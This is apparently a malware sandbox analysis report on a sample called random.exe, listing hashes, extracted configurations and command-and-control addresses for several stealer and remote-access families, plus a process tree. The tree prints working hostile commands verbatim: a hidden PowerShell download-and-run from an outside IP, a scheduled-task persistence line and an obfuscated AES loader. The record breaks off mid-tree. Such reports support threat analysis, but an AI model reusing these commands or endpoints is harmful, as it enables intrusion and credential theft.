Analysis

  • max time kernel
    88s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-02-2025 16:10

General

  • Target

    random.exe

  • Size

    938KB

  • MD5

    76d04be1cdeeace530e6266b8ede7380

  • SHA1

    bdb334d85eea027c9b5c0442027497ea03cf3f85

  • SHA256

    ddda70cdab79b119b205e60921ba6048887312cdd47741f9259fc4bc0c83a18a

  • SHA512

    e6605a7f104aef95df3b2be7fd54302e8d9799e6fc967816cb63d144f89cabc0504d0f175a58f0e0b977a7a7551e60d1f518259b8b5a9203eafedf66cd8153fe

  • SSDEEP

    24576:SqDEvCTbMWu7rQYlBQcBiT6rprG8ay4F:STvC/MTQYxsWR7ay4

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:7000

Mutex

0HzpJoisb4u9PgIO

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Detects GOST tunneling tool 1 IoCs

    A simple tunneling tool written in Golang

  • Downloads MZ/PE file 17 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn xbkwfmacM0W /tr "mshta C:\Users\Admin\AppData\Local\Temp\vGn4DKnt6.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3916
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn xbkwfmacM0W /tr "mshta C:\Users\Admin\AppData\Local\Temp\vGn4DKnt6.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3548
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\vGn4DKnt6.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YXS8SHZMOTWVBNFB3BUSXEQAPTV944NZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3592
        • C:\Users\Admin\AppData\Local\TempYXS8SHZMOTWVBNFB3BUSXEQAPTV944NZ.EXE
          "C:\Users\Admin\AppData\Local\TempYXS8SHZMOTWVBNFB3BUSXEQAPTV944NZ.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3248
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2144
            • C:\Users\Admin\AppData\Local\Temp\1014060001\79905d6589.exe
              "C:\Users\Admin\AppData\Local\Temp\1014060001\79905d6589.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2808
              • C:\Users\Admin\AppData\Local\Temp\1014060001\79905d6589.exe
                "C:\Users\Admin\AppData\Local\Temp\1014060001\79905d6589.exe"
                7⤵
                • Executes dropped EXE
                PID:4900
              • C:\Users\Admin\AppData\Local\Temp\1014060001\79905d6589.exe
                "C:\Users\Admin\AppData\Local\Temp\1014060001\79905d6589.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3492
              • C:\Users\Admin\AppData\Local\Temp\1014060001\79905d6589.exe
                "C:\Users\Admin\AppData\Local\Temp\1014060001\79905d6589.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1648
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 972
                7⤵
                • Program crash
                PID:1892
            • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
              "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:3056
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3332
            • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
              "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4584
            • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
              "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4808
              • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
                "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1308
              • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
                "C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1352
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 984
                7⤵
                • Program crash
                PID:384
            • C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe
              "C:\Users\Admin\AppData\Local\Temp\1071276001\Fe36XBk.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2480
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4384
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4768
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:888
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  8⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:568
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1932
            • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
              "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3504
            • C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe
              "C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:780
            • C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe
              "C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3780
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                  PID:4852
              • C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe
                "C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4544
              • C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe
                "C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:384
              • C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe
                "C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1148
              • C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe
                "C:\Users\Admin\AppData\Local\Temp\1083537001\m5UP2Yj.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                PID:4688
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 1592
                  7⤵
                  • Program crash
                  PID:3792
              • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
                "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:3672
                • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
                  "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1136
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    8⤵
                    • Uses browser remote debugging
                    PID:1204
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe318ecc40,0x7ffe318ecc4c,0x7ffe318ecc58
                      9⤵
                        PID:2800
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,3055987411389432106,1971133465920038223,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1808 /prefetch:2
                        9⤵
                          PID:1408
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2092,i,3055987411389432106,1971133465920038223,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2088 /prefetch:3
                          9⤵
                            PID:1904
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,3055987411389432106,1971133465920038223,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2364 /prefetch:8
                            9⤵
                              PID:3108
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,3055987411389432106,1971133465920038223,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:3264
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,3055987411389432106,1971133465920038223,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3272 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:4440
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4416,i,3055987411389432106,1971133465920038223,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4468 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:4816
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,3055987411389432106,1971133465920038223,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4628 /prefetch:8
                              9⤵
                                PID:2644
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,3055987411389432106,1971133465920038223,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:8
                                9⤵
                                  PID:1132
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4376,i,3055987411389432106,1971133465920038223,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:8
                                  9⤵
                                    PID:1080
                              • C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
                                "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:428
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                  8⤵
                                  • Uses browser remote debugging
                                  PID:2448
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe318ecc40,0x7ffe318ecc4c,0x7ffe318ecc58
                                    9⤵
                                      PID:1556
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,4606861251652997996,6408993214925059519,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1832 /prefetch:2
                                      9⤵
                                        PID:864
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1692,i,4606861251652997996,6408993214925059519,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2124 /prefetch:3
                                        9⤵
                                          PID:892
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,4606861251652997996,6408993214925059519,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2372 /prefetch:8
                                          9⤵
                                            PID:3636
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,4606861251652997996,6408993214925059519,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3148 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:3916
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,4606861251652997996,6408993214925059519,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:3856
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,4606861251652997996,6408993214925059519,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4456 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:680
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3596,i,4606861251652997996,6408993214925059519,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4568 /prefetch:8
                                            9⤵
                                              PID:1632
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4576,i,4606861251652997996,6408993214925059519,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4716 /prefetch:8
                                              9⤵
                                                PID:712
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
